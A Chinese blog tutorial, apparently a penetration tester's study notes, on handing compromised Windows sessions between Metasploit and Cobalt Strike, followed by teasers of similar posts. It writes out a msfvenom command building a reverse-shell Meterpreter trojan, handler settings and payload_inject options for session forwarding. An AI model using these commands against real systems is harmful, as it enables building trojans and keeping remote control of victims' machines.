【MSF与CS联动】

最新推荐文章于 2025-04-27 22:36:48 发布
最新推荐文章于 2025-04-27 22:36:48 发布
阅读量3.1k 收藏 24
点赞数 4
CC 4.0 BY-SA版权
分类专栏: 学习笔记 文章标签: 网络 windows linux web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61872115/article/details/126560796

文章目录

前言

msf和cs都是渗透过程中常用的工具,两者得结合使用也非常多见,简单介绍该如何去做

1.MSF会话传递到CS

一、MSF监听木马上线

1.制作msf木马

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=8088 -f exe >/root/msf.exe

在这里插入图片描述

2.上传msf木马并监听

在渗透过程中,通常在上传webshell后开始上传木马并监听,这里就不介绍了,直接运行

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.0.109
set lport 8088
exploit

在这里插入图片描述
在这里插入图片描述
上线成功

3.后台运行

在这里插入图片描述

二、联合CS

1.启动CS并创建监听器

在这里插入图片描述

2.MSF上使用payload_inject模块

use exploit/windows/local/payload_inject //使用该模块可以将 Metasploit 获取到的会话注入到CS中
set payload windows/meterpreter/reverse_http //和cs监听器保持一致
set prependmigrate true 
set DisablePayloadHandler true //用来禁用 Metasploit payload handler的监听 因为要监听到cs上
set lhost 192.168.0.109    //CS的IP
set lport 8089   //CS上的listen端口
set session 7   //要转发的session

在这里插入图片描述

3.成功上线

2.CS会话传递到MSF

一.CS木马上线

这里就不细讲了,通用流程就是,建立监听器后制作木马,上传运行上线即可
在这里插入图片描述

二.msf创建监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.0.109
set lport 8088
exploit

在这里插入图片描述

三.CS添加监听器

在这里插入图片描述
在这里插入图片描述

四.右键上线的主机,增加会话

在这里插入图片描述

五.会话传递成功

在这里插入图片描述

总结

本期主要介绍了msf和cs联动使用的方法

内网安全学习(八)---CS&MSF联动
qi_SJQ_的博客
02-17 3834
域横向 CS&MSF 联动 Shell CS->MSF: 创建Foreign监听器 MSF监听模块设置对应端口地址 CS执行Spawn选择监听器 MSF->CSCS创建监听器 MSF载入新模块注入设置对应地址端口 执行CS等待上线 use exploit/windows/local/payload_inject 首先需要两台服务器,一个上线cs一个上线msf 启动上线cs生成木马上线两台主机,之后启动msf。 1)接下来,将CS移交到MSF上: 先添加会话,填写msf主机信息: 配
csmsf联动
inslight的博客
09-22 1115
csmsf联动
MSF&CS互相联动
剁椒鱼头没剁椒的博客
07-28 2254
在日常渗透测试或者是你偷偷干坏事的时候,可能会发现,CS确实是一个强大的后渗透工具,但是奈何CS很多关于漏洞的功能都是只能检测,但是不能攻击,所以需要CSMSF互相联动起来,这里我就利用一个永恒之蓝漏洞来。
msfcs联动
bring_coco的博客
05-18 2226
环境:kali(192.168.190.128)NATAPP。
CS&MSF联动
kukudeshuo的博客
09-23 427
CS&MSF联动 CS联动MSF 现在CS这边已经成功上线一台主机,需要将这个会话传入MSF CS这边新建一个监听器 然后打开MSF use exploit/multi/handler set payload windows/meterpreter/reverse_http #需要设置成CS一样的payload set lhost 192.168.109.128 set lport 5566 #需要设置成跟CS一样的端口 然后CS这边选择增加会话 然后指定生成的msf监听器即可 可以看
csmsf联动概述
weixin_43873557的博客
02-08 2524
cobalt strike(简称CS)及Metasploit(简称msf)各有所长,cs更适合作为稳控平台,msf更适用于各类内网信息搜集及漏洞利用。为了取各家之所长,我们进行联动。 获得beacon shell,启动socks shell ipconfig 目标机器在24.*网段,仅一个网段 思路:利用 beacon shell 在目标机器和团队服 务器之间建立 socks,而后再在本地利用proxychains 之类的工具连到目标内网即可。 查看团队服务器 socks 端口启起来了没有:netst
CSMSF的权限互相传递/mimikatz抓取windows 2012明文密码
qq_68163788的博客
06-26 1778
CS(Cobalt Strike)和MSF(Metasploit Framework)是两种常用的渗透测试工具,用于测试网络安全并获取权限。此外,mimikatz是一款功能强大的工具,可以用于抓取Windows系统中的明文密码。通过修改注册表和等待目标系统管理员重新登录,可以使得明文口令在lsass进程中保存。这样一旦管理员重新登录,mimikatz就可以成功地抓取到明文密码。这些工具在渗透测试和网络安全领域中具有重要的作用。
csmsf联动
FSecurity的博客
04-26 569
目录 cobalt strike和metasploit联动 1.使用kali、vps来做csmsf(这里我使用的vps是阿里云服务器) 2.xshell连接vps,进入msf使用模块use expsploit/multi/handler 3.如果vps没有metersploit就用命令行下载 github(Installing) 这里我是已经下载好了的 4.在模块里进行设置,我这里使用的IP是阿里云的内网IP(端口随便) 5.记住xshell的防火墙要关闭(这里我的已经关了) 看到绿色标注的“act
Csmsf互传shell
2201_75387456的博客
06-02 511
首先咋们需要准备两台kali,一台win10靶机咋们利用kali1打开cs,利用kali2打开msf进行联动;在cs上建立一个监听,名字随便起,这里我起名为test,ip输入kali1的;生成一段payload,并在win10靶机上线(在win10点击生成的payload即可)然后在kali2启动msf,使用监听模块命令:msfconsole //进入msf控制台use exploit/multi/handler //进入监听模块。
MSFCS联动
GoDunTong's Blog
04-08 4463
转载自Snowming04’s Blog 0x01 准备工作 受害主机:在关闭 Windows Defender 和其他一切杀软的前提下,在 Win 10 主机下进行的实验。 MSF:本地 kali Cobalt Strike 团队服务器:Ubuntu VPS Cobalt Strike:3.14 团队服务器: 客户端: 上线过程: 因为我关闭了一切杀软及 Windows Defender,自不必做免杀。 一些朋友搞不清楚 Windows Executable 和 Windows Exec.
MSFCS会话互相传递
fishfishfishman的博客
08-15 982
作为C2工具,MSFCS各有千秋,CS有着多种强大的自定义插件和易操作的图形化界面,而MSF集成了针对各类系统的Payload攻击代码,为了针对性的进行攻击,我们有时候会需要将MSF会话转发到CS,或者相反。
后渗透之MSF联动CS
dl1286670932的博客
12-14 626
Cobalt Strike(简称CS)是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动,分为服务器和客户端。MSF这边已经成功获得一台主机会话,需要将这个会话上线CSCS这边成功上线了一台主机,同MSF一致。可以看到后台开启的软件服务进程。MSF这里输入payload。CS这边新建一个监听器。
MSFCS联动转换
最新发布
m0_64398925的博客
04-27 268
1、将MSF获得meterpreter会话放在后台:backgrod。set lport CS外联监听器的端口(此处应为4441)set lport CS外联监听器的端口(此处应为414)3、CS指定会话里运行spawn 外联监听器名。session 选择要复制的session会话。set lhost CS服务器地址。set lhost CS服务器地址。4、MSF运行run,即可上线CS。1.CS创建外部监听器。
CS + MSF 联动
A_dmin的博客
12-23 1702
CS + MSF 联动 首先cs上已经成功上线: Kali查看IP地址: Msf上操作: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.198.128 set lport 7777 exploit -j #-j 后台监听(ps:这里手抖少打了一个7) 如果msf处于公网,cs添加监听器Listener,HOST和PORT填写msf监听的地址IP:xxxx,PORT:7777
细说——CS联动MSF
LainWith的博客
08-06 7294
目录环境准备CS ——> MSFubuntu准备cs客户机器准备msf准备补充MSF ——> CSMSF准备ubuntu-cs准备 网上的文章,写的很简介,看的脑壳疼,自己动手,详实的记录一下学习过程 环境准备 我使用两台vps,一台是kali 52.69.164.3,一台是ubuntu 52.194.218.196​ kali使用msf,ubuntu使用cs服务器,物理机使用cs客户端,虚拟机win7是受害者 CS ——> MSF 简单来说,就是当cs拿到一台主机之后,新增一个用于转发
CSMSF联动
weixin_39407564的博客
01-14 279
Colbalt Strike(简称CS)及MetaSploit(简称MSF)各有所长,cs更适合作为稳控平台,msf更适用于各类内网信息搜集及漏洞利用。为了取各家之所长,可以进行联动
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一纸-荒芜

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值